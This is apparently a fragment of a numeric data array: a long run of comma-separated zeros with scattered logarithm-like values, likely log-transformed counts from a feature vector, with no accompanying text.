0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 3.044522437723423, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.2958368660043296,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 5.030104765080701, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.6443908991413725, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 12.444372333547394, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 2.6390573296152584, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 4.812184355372417, 0, 3.295836866004329, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, \n 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0, 0, 0.0, 1.6094379124341003, 2.70805020110221, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.90527477843843, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.3862943611198906, 1.7412592803704001, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.030437921392435, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.969640753475787, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.8888779583328805, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.9444389791664403, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 6.864049944976711, 0, 0.0, 2.3978952727983707, 0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.631631038266565,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 2.8903717578961645, 2.8398715690385097, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.1588830833596715, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0,\n 0.0, 0.6931471805599453, 3.7369991058576035, 0, 0.0, 2.9957322735539913,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.9930151229329605, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 3.649511027115099, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0, \n 2.8398715690385097, 0, 0.0, 4.518263445217987, 0.0, 0, \n 4.748123315783209, 4.292158018817389, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 